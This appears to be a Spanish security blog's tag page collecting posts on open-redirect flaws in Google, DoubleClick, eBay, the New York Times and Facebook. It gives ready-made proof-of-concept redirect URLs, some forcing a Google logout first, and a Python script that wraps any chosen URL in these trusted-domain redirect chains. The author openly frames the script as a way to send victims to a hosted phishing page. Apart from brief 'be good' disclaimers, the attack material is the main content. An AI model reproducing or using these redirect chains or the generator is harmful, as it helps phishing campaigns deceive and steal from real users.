Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Url Redirection. Mostrar todas las entradas
Mostrando entradas con la etiqueta Url Redirection. Mostrar todas las entradas

martes, 31 de octubre de 2017

Python.- Open Redirect Scanner

En este blog nos hemos reído mucho [trasteando con open Redirects] y lo que podían comportar si un usuario hace clic en ellos, ademas hemos creado mas de una PoC cuando encontrábamos alguno. Pero hoy revisando mis redes sociales he dado con un escaner muy sencillo de este tipo de vulnerabilidades. 


Si, he dicho que es muy sencillo pero admiro la vuelta de tuerca que le ha dado Ak1t4 ya que usando diferentes búsquedas o páginas consigue saber si se ha conseguido la redirección o no. Os recomiendo que os leáis el código. 

Enlace a la herramienta:


Sed Buenos ;)

jueves, 9 de junio de 2016

El OpenRedirect de Google

Ya hablamos hace tiempo del la lista de correo Bugtraq y de todo lo que podíamos encontrar en la página de SecList.Org, pues ya hace tiempo se publicó un URL redirect que afectaba a Google y que la empresa del fantástico buscador  no ve como vulnerabilidad (Técnicamente no afecta a Google directamente) pero si que puede afectar a terceras personas o ayudar que que la gente pique en temas de Phishing.


Así que me he montado una PoC con WhatistheirIp y el URL redirect para que se pueda ver la afectación.  Bueno el "usage" es fácil, la vulnerabilidad reside en la siguiente URL: 
  • https://www.google.com/amp/XXXX 
Así que solo tendréis que substituir las XXXX por la pagina web a la que quereis que la víctima vaya, sin el https:// o el http://

Ejemplo y fuente:

PoC:


Sed buenos con esto 0;) 

domingo, 30 de noviembre de 2014

Automatizando El Url Redirection con #Python, No Iba A Ser Menos.

Hace ya unos días hablé de los diferentes [redirects debido a que Google] no comprobaba la redireción en en GoogleDoubleClick.net. Lo cual [afectaba a Ebay y al Nytimes] y o he aprovechado para crear otro script para que, una vez construido nuestro phishing y subido algún servidor, podamos redirecciónar la url que queramos.


Aquí tenéis es script como es de menester: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys

def Google(url):
#Google
re1 = "http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl="+url
re2 = "http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl="+ url
redirects =[re1,re2]
guardar(redirects)
def Google2(url):
#Google2
re3 = "https://www.google.com/accounts/ServiceLogin?continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+ url +"/essaybeans/reflections/solitude.html"
re4 = "https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl=" + url
redirects =[re3,re4]
guardar(redirects)
def Google3(url):
#Google3
re5 = "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward="+ url
re6 = "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward="+ url
redirects =[re5,re6]
guardar(redirects)
def Google4(url):
#Google4
re7 = "https://www.google.com/accounts/Logout?service=wise&continue=http://googleads.g.doubleclick.ne/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+ url
redirects =[re7]
guardar(redirects)
def Ebay(url):
#Ebay
re8 = "http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CÑRHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=" + url
redirects =[re8]
guardar(redirects)
def nytimes(url):
#nytimes
re9 = "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http://ad.doubleclick.net/ddm/clk/279541164;106630011;s?"+ url +"?-inclusive.php?utm_source=nyt&utm_medium=display&utm_content=clicktracker&utm_campaign=300x250_ExpectMore_NYT_NYRegion"
redirects =[re9]
guardar(redirects)
def GoogleLogout(url):
#Google Redirect&logout
re10 = "https://www.google.com/accounts/Logout?service=wise&continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+url
redirects =[re10]
guardar(redirects)
def Lucky(url):
#"I'm Feeling Lucky"
re11 = "https://www.google.com/#&q="+ url +"&btnI=denoqa"
redirects =[re11]
guardar(redirects)

def guardar(item):
g1 = open("urls.txt",'w')
for redirect in item:
g1.write(redirect +"\n")
print "Done"  

if __name__ == "__main__":
d1 = raw_input("""
_________________________________________________________
|                                                         |
| Redirect NOW                                            |
| Select one Redirect:                                    |
|         1- Google: 2 redirects                          | 
|         2- Google2: 2 redirects                         |
|         3- Google3: 2 redirects                         |
|         4- Google4: 1 redirect                          |
|         5- GoogleLogout: 1 redirect + logout google     |
|         6- Ebay: 1 redirect                             |
|         7- nytimes: 1 redirect                          |
|         8- Lucky: 1 redirect                            | 
|_________________________________________________________|

Write redirect number: """)

if d1 == "1":
d2 = raw_input("Write url: ")
Google(d2)
elif d1 == "2":
d2 = raw_input("Write url: ")
Google2(d2)
elif d1 == "3":
d2 = raw_input("Write url: ")
Google3(d2)
elif d1 == "4":
d2 = raw_input("Write url: ")
Google4(d2)
elif d1 == "5":
d2 = raw_input("Write url: ")
GoogleLogout(d2)
elif d1 == "6":
d2 = raw_input("Write url: ")
Ebay(d2)
elif d1 == "7":
d2 = raw_input("Write url: ")
nytimes(d2)
elif d1 == "8":
d2 = raw_input("Write url: ")
Lucky(d2)
else: 
print "That's imposible"

Por si no lo he explicado el funcionamiento bien o no lo entendisteis del todo. He grabado este vídeo para que todo quede mas claro. 


Si os queréis descargar este script o hacer algún commit aquí os dejo mi GitHub:


Sed Buenos con esto 0;) 

martes, 18 de noviembre de 2014

Redireccionando Nuestro Phishing Desde eBay y NYtimes Gracias A Google DoubleClick.net

La [vulnerabilidad en Google DoubleClick.net] ha dado para mucho en estos días y gracias a el no solo podemos forzar un logout y redirigirlo desde Google sino que podemos hacerlo desde eBay y NYtimes pero doliéndonos del logout. Esto abre mucho el abanico de posibles lugares para colar un phishing. 

eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net:

  • Url de la PoC:
    • http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=URLQUETEINTERESEREDIRECIONAR
  • Video de la PoC:

The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net


  • Url de la PoC: 
    • http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3FURLQUETEINTERESEREDIRECIONAR%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion
  • Video de la PoC: 

Como habéis podido ver en los videos, estos dos redirecs al ser pegados en facebook muestran la pagina a la que es redirigida. Pero, sirven igualmente.

No os fieis de ninguna url, miradla siempre con cuidado.

Sed Buenos con esto  0;) 

sábado, 15 de noviembre de 2014

PoC Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

Ayer por la noche, antes de irme a dormir, decidí pasarme un poco por [seclists.org] y me encontré con un hilo de Wang Jing donde hablaba de un Bypass para saltarse la lista blanca de google que limita las redirecciones.


Cuando un usuario es redireccionado desde Google a otro sitio, Google comprueba si la URL redirigida pertenece a los dominios en la lista blanca de Google (Esta lista blanca contiene generalmente sitios web pertenecen a Google), 

Pero, si la dirección de uno de estos dominios de lista blanca no nos comprobadas el usuario podría redireccionar la url que quisiera a Google. Esto ayudaría mucho al mundo del Phising ya que podríamos montarnos una web y hacer que picaran ya que estaríamos mostrando una url de Google y ademas forzar un LogOut al usuario. 

Por ejemplo, Googleads.g.doubleclick.net que [es el servició para cuantificar los click de AdSense] no revisa la redirección asi que podríamos montar una url para forzar un deslogueo e insetar nuestra página.

PoC: 
  • https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Finfostatex.blogspot.com

Mas información: 
Por si la explicación ha quedado un poco rara y ya que el señor Snifer tenia razón y tendría que añadir algunas PoC a mis artículos, ayer por la noche gravé un par de videos para que se entendiera mejor este ByPass.

  • PoC Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net:


  • PoC Bypass Google Open Redirect Filter Lucky Trick de Nick Semenkovich utilizando "Voy a tener suerte" 
    • Url de la vuelnarabilidad: 
      • https://www.google.com/#&q=SomeUniqueLongStringHere&btnI=denoqa



Sed Buenos con esto 0;) y espero que os hayan gustado las PoC. 

martes, 7 de enero de 2014

Url Redirection Vulnerability.- Facebook con PoC

Hace tiempo que no hacia experimentos en este blog pero después de la bronca del señor [Snifer] en los comentarios de [la entrada de hace dos] días me he puesto manos a la obra.  Hoy os traigo una vulnerabilidad de Url Redirection para Facebook con una prueba de concepto que aun a día de hoy esta vigente. 


Una vulnerabilidad de Url Redirection es una técnica para hacer que una página web esté disponible en más de una URL de direcciones. Cuando un navegador web intenta abrir un URL que ya ha sido redirigida, se abre una página con una URL diferente.

En este caso Facebook tiene un par de vulnerabilidades tanto en su apps.facebook.com como facebook.com



Prueba de Concepto: 



Sed Buenos con esto ;)

Fuente: http://www.blackploit.com/